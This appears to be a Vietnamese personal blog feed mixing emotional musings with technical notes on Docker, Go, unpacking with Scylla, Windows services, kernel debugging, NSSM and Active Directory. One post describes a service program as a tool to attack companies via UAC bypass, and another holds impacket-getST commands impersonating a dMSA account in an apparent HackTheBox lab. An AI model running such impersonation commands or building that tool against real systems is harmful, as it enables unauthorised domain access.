Bài đăng

 Mỗi hành động của mình đôi khi sẽ gây ra tổn thương cho người khác. Chán quá, đúng là tao

Cảnh giới đau lòng nhất của 1 người là gì

 Khi họ nhận ra họ đã tin nhầm người, họ nghĩ họ đc thương hại và những thứ của họ chỉ alf một trò đùa
 Thuc ra doi luc con nguoi chi can 1 cau noi thoi. Nhieu thu se dan tan bien. Toi yeu K0n va se mai mai nhu vay
Đã cho phép bản thân yếu mềm 1 lần, nếu đã không được thì cứ theo kế hoạch ban đầu. Dù sao thì trước đây vẫn ổn cả, chỉ là một chút nhất thời chả đáng bận tâm. Tao vẫn yêu đời lắm.

Docker reve

# Dockerfile hoàn chỉnh cho Python 3.10.11 + pip + pycdc + curl FROM ubuntu:22.04 ENV DEBIAN_FRONTEND=noninteractive USER root # Cài các gói hệ thống cần thiết (curl, build tools, libs cho Python) RUN apt-get update && apt-get install -y \     wget \     curl \     build-essential \     libssl-dev \     zlib1g-dev \     libncurses5-dev \     libncursesw5-dev \     libreadline-dev \     libsqlite3-dev \     libgdbm-dev \     libdb5.3-dev \     libbz2-dev \     libexpat1-dev \     liblzma-dev \     tk-dev \     libffi-dev \     git \     cmake \     g++ \     && rm -rf /var/lib/apt/lists/* # Tải và cài Python 3.10.11 từ mã nguồn WORKDIR /tmp RUN wget https://www.python.org/ftp/python/3.10.11/Python-3.10.11.tgz \     && tar -xzf Python-3.10.11.tgz \   ...

Golang or golab

 Code go từ cơ bản đến nâng cao code hello world cơ bản package main import "fmt" func main(){ fmt.Println("Hello world") } ================= Khai báo biến package main import "fmt" func main(){ var name string name = "hacked by kon"     fmt.Println(name) }
Hình ảnh
 reconstruct function  fastcall
 Tình buồn mai chắc buồn chưa Nỗi đau quá khứ, bây giờ đáng yêu

Tránh tràn ram máy tính

Hình ảnh
 Tat hoan toan may tinh tranh tran ram, cham may Shift + shutdown Shutdown binh thuong chi tat phan co cua may tinh 

Tập tành dump và unpack code

Hình ảnh
  Chạy het popad roi dung scylla dump

Code Service CPP

wmain-> StartServicecCtrlDispatcher ->  ------------ sc queryex <name>  taskkill /PID <pid> /F ==== Tool dùng để tấn công các công ty eco :DD Bypass UAC và đăng kí service thôi :3 #define _CRT_SECURE_NO_WARNINGS #include "Windows.h" #include "stdio.h" #include "log.h" #define SERVICE_NAME L"Meo" SERVICE_STATUS svstatus; SERVICE_STATUS_HANDLE svstatus_handle; void WINAPI HandleFunction(DWORD Control) { switch (Control) { case 2: svstatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus(svstatus_handle, &svstatus); } } void WINAPI ServiceMain(DWORD dwNumServicesArgs, LPWSTR* lpServiceArgVectors) { svstatus_handle = RegisterServiceCtrlHandlerW(SERVICE_NAME, HandleFunction); // luồng logic chính //** start svstatus.dwCurrentState = SERVICE_RUNNING; svstatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS; svstatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; SetServiceStatus(svstatus_handle, &svstatus); ...

Hướng dẫn debug kernel trong vmware

 cai windebug attacker vo kernel thi chu y  chu y secure boot tat chua, neu chua vo thi de disable bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 msconfig nen nho, chi attach khi boot -> nen chay windbg truoc khi khoi dong vmware ========================== !process 0 0: Liệt kê các process đang chạy bp nt!NtWriteFile: dat breakpoint tai NtWriteFile trong nt.dll bl: list breakpoint bc 1: xoa breakpoint 1 g: go(continue) k: call stack !process 0 0 notepad.exe bp /p ffff920bda2890c0 nt!NtWriteFile: đặt breakpoint tại hàm NtWriteFile được dùng bởi nt.dll trong địa chỉ fff... !handle @rcx

In process CPP

 #include <windows.h> #include <stdio.h> #include <tlhelp32.h> int main() {     PROCESSENTRY32W pe;     pe.dwSize = sizeof(PROCESSENTRY32W);     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);     if (hSnapshot == INVALID_HANDLE_VALUE)     {         printf("Cant get snapshot\n");         return 1;     }     if (!Process32FirstW(hSnapshot, &pe))     {         printf("Process32First failed: %lu\n", GetLastError());         CloseHandle(hSnapshot);         return 1;     }     do     {         wprintf(L"%ls\n", pe.szExeFile);     } while (Process32NextW(hSnapshot, &pe));     CloseHandle(hSnapshot);     return 0; }

Kiểu dữ liệu WINAPI

 Bảng nhanh (hay dùng trong WinAPI) WinAPI type C type printf DWORD unsigned long %lu WORD unsigned short %hu BYTE unsigned char %u BOOL int %d HANDLE pointer %p LPVOID pointer %p

Tao dich vu webnext

Tao service bang nssm, next run build khi set gi thi nho tao cai do, nho them quyen cho thu muc nho chu y ObjectName de set quyen cho user ==== viết lại chi tiết cách làm OK 👍, anh muốn viết lại chi tiết – từ đầu đến cuối – làm đúng 1 lần là chạy vĩnh viễn khi boot , thì em viết chuẩn checklist , không sót bước nào. Làm theo đúng thứ tự , đừng nhảy cóc.  MỤC TIÊU CUỐI Windows Server boot lên KHÔNG cần login Service tự chạy Web Next.js lên cổng 3000 Export VM -> máy khác import ->  vẫn chạy Thành phần Vị trí Node.js C:\Program Files\nodejs\ App Next.js C:\myapp NSSM C:\nssm\nssm.exe Service user thynb (user thường) Start type AUTO + DELAYED 1️⃣ CÀI NODE.JS (SYSTEM-WIDE) BẮT BUỘC : cài cho All Users Check: where node Phải ra: C:\Program Files\nodejs\node.exe 2️⃣ ĐẶT SOURCE CODE NEXT.JS mkdir C:\myapp Copy toàn bộ source vào C:\myapp Build production: cd C:\myapp npm install npm run build Test chạy tay: node node_modules\next\dist\...

Tat ca nhan hoa google

 No track my fingerprinter https://myactivity.google.com/search-personalization

user-signin-ad

  1) Open the Group Policy editor using gpmc.msc 2) Select your domain and expand Group Policy Objects then right click on "Default Domain Controller Policy" and Click Edit 3) Under Computer Management, expand Policies and then select Windows Settings 4) Expand Security Settings and Select Local Policies and then click on User Rights Management 5) Right click on Deny log on locally and click on Properties 6) In the next screen you can remove the User of Group that you want

Tắt đồng bộ time vmware

  sudo vmware-toolbox-cmd timesync disable ------------- cd "C:\Program Files\VMware\VMware Tools" vmtoolsd.exe timesync disable proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA   $$' -debug TZ=UTC faketime '2026-01-14 10:45:09' proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'

Cac phim tat Intellij

Double shilf: Tìm nhanh mọi tứ trong project lớn = Ctrl + N Ctrl + B: Theo doi nguon goc bien - trace luong truoc Alt + F7: Tìm nơi sử dụng biến Ctrl + Shilf + F: tìm kiếm text toàn project Shilf + F10: Run Shilf + F9: Debug F9: chạy đến breakpoint kế tiếp F8: Step over F7: Step into Shift + F8: thoát khỏi method hiện tại Ctrl + ALT + L: format code Ctrl + F12: hiển thị các methods